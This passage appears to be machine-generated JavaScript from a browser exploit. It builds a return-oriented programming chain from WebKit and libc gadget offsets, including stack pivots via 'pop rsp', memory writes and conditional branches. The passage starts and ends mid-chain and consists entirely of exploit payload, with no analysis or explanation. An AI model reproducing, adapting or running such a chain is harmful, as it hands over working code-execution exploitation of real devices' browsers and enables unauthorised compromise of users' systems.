webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+402896, //L8439 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8439: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8440: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+402992, //L8441 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8441: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8442: db([98, 0]); // 0x62 set_gadget(libc_base+144605,); //pop rdi //L8443: db([98, 0]); // 0x62 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+403136, //L8444 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+403168, //L8446 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+403152, //L8445 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8444: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8445: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8446: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+403336, //L8448 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+403352, //L8449 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop 
rsi ropchain+403320, //L8447 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8447: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8448: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8449: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+403464, //L8451 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+403512, //L8454 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+403480, //L8452 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8451: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8452: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8453: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8454: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+403624, //L8455+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+403616, //L8455 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L8455: db([0, 0]); // 0x0 set_gadgets([ ropchain+403640, //L8455+24 ropchain+403656, //L8450 libc_base+782311, //pop rsp ropchain+408824, //L8456 //L8450: libc_base+764760, //pop rsi ropchain+403696, //L8457 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L8457: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8459: db([4294967196, 4294967295]); // -0x64 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+403816, //L8462 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+403800, //L8460 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8460: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8462: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+403992, //L8465 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+404008, //L8466 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+403960, //L8463 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+403976, //L8464 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8463: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8464: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8465: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8466: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+404088, //L8467 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+404104, //L8468 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8467: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8468: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+404200, //L8470 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+404184, //L8469 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8469: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8470: db([0, 0]); // 0x0 
set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+404280, //L8471 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8471: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8472: db([99, 0]); // 0x63 set_gadget(libc_base+144605,); //pop rdi //L8473: db([99, 0]); // 0x63 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+404424, //L8474 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+404456, //L8476 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+404440, //L8475 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8474: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8475: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8476: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+404624, //L8478 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+404640, //L8479 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+404608, //L8477 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8477: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8478: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8479: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, 
//movsxd rax, edi libc_base+764760, //pop rsi ropchain+404752, //L8481 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+404800, //L8484 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+404768, //L8482 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8481: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8482: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8483: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8484: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+404912, //L8485+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+404904, //L8485 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L8485: db([0, 0]); // 0x0 set_gadgets([ ropchain+404928, //L8485+24 ropchain+404944, //L8480 libc_base+782311, //pop rsp ropchain+488736, //L8486 //L8480: libc_base+764760, //pop rsi ropchain+404984, //L8487 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L8487: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8489: db([4294967196, 4294967295]); // -0x64 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+405104, //L8492 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+405088, //L8490 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8490: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8492: db([0, 0]); // 0x0 set_gadgets([ 
libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+405280, //L8495 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+405296, //L8496 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+405248, //L8493 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+405264, //L8494 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8493: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8494: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8495: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8496: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+405376, //L8497 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+405392, //L8498 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8497: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8498: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+405488, //L8500 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+405472, //L8499 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8499: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8500: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+405568, //L8501 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8501: 
db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8502: db([115, 0]); // 0x73 set_gadget(libc_base+144605,); //pop rdi //L8503: db([115, 0]); // 0x73 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+405712, //L8504 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+405744, //L8506 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+405728, //L8505 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8504: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8505: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8506: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+405912, //L8508 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+405928, //L8509 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+405896, //L8507 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8507: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8508: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8509: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+406040, //L8511 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+406088, //L8514 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi 
ropchain+406056, //L8512 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8511: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8512: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8513: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8514: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+406200, //L8515+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+406192, //L8515 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L8515: db([0, 0]); // 0x0 set_gadgets([ ropchain+406216, //L8515+24 ropchain+406232, //L8510 libc_base+782311, //pop rsp ropchain+503184, //L8516 //L8510: libc_base+764760, //pop rsi ropchain+406272, //L8517 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L8517: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8519: db([4294967196, 4294967295]); // -0x64 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+406392, //L8522 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+406376, //L8520 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8520: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8522: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+406568, //L8525 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+406584, //L8526 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi 
ropchain+406536, //L8523 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+406552, //L8524 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8523: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8524: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8525: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8526: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+406664, //L8527 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+406680, //L8528 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8527: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8528: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+406776, //L8530 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+406760, //L8529 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8529: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8530: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+406856, //L8531 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8531: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8532: db([112, 0]); // 0x70 set_gadget(libc_base+144605,); //pop rdi //L8533: db([112, 0]); // 0x70 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+407000, //L8534 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, 
//mov rax, [rsi] libc_base+764760, //pop rsi ropchain+407032, //L8536 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+407016, //L8535 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8534: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8535: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8536: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+407200, //L8538 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+407216, //L8539 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+407184, //L8537 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8537: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8538: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8539: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+407328, //L8541 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+407376, //L8544 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+407344, //L8542 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8541: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8542: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8543: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8544: db([0, 0]); // 0x0 
set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+407488, //L8545+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+407480, //L8545 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L8545: db([0, 0]); // 0x0 set_gadgets([ ropchain+407504, //L8545+24 ropchain+407520, //L8540 libc_base+782311, //pop rsp ropchain+530624, //L8546 //L8540: libc_base+764760, //pop rsi ropchain+407560, //L8547 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L8547: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8549: db([4294967196, 4294967295]); // -0x64 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+407680, //L8552 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+407664, //L8550 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8550: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8552: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+407856, //L8555 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+407872, //L8556 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+407824, //L8553 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+407840, //L8554 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8553: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8554: db([0, 0]); // 0x0 
set_gadget(libc_base+144605,); //pop rdi //L8555: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8556: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+407952, //L8557 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+407968, //L8558 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8557: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8558: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+408064, //L8560 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+408048, //L8559 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8559: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8560: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+408144, //L8561 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8561: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8562: db([37, 0]); // 0x25 set_gadget(libc_base+144605,); //pop rdi //L8563: db([37, 0]); // 0x25 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+408288, //L8564 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+408320, //L8566 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+408304, //L8565 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8564: db([0, 0]); // 0x0 
set_gadget(libc_base+144605,); //pop rdi //L8565: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8566: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+408488, //L8568 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+408504, //L8569 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+408472, //L8567 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8567: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8568: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8569: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+408616, //L8571 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+408664, //L8574 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+408632, //L8572 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8571: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8572: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8573: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8574: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+408776, //L8575+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+408768, //L8575 webkit_base+660161, 
//mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L8575: db([0, 0]); // 0x0 set_gadgets([ ropchain+408792, //L8575+24 ropchain+408808, //L8570 libc_base+782311, //pop rsp ropchain+542480, //L8576 //L8570: libc_base+782311, //pop rsp ropchain+544992, //L8577 //L8276: //L8306: //L8336: //L8366: //L8396: //L8426: //L8456: libc_base+764760, //pop rsi ropchain+408864, //L8578 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L8578: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8580: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+408984, //L8583 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+408968, //L8581 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8581: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8583: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+409064, //L8584 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop 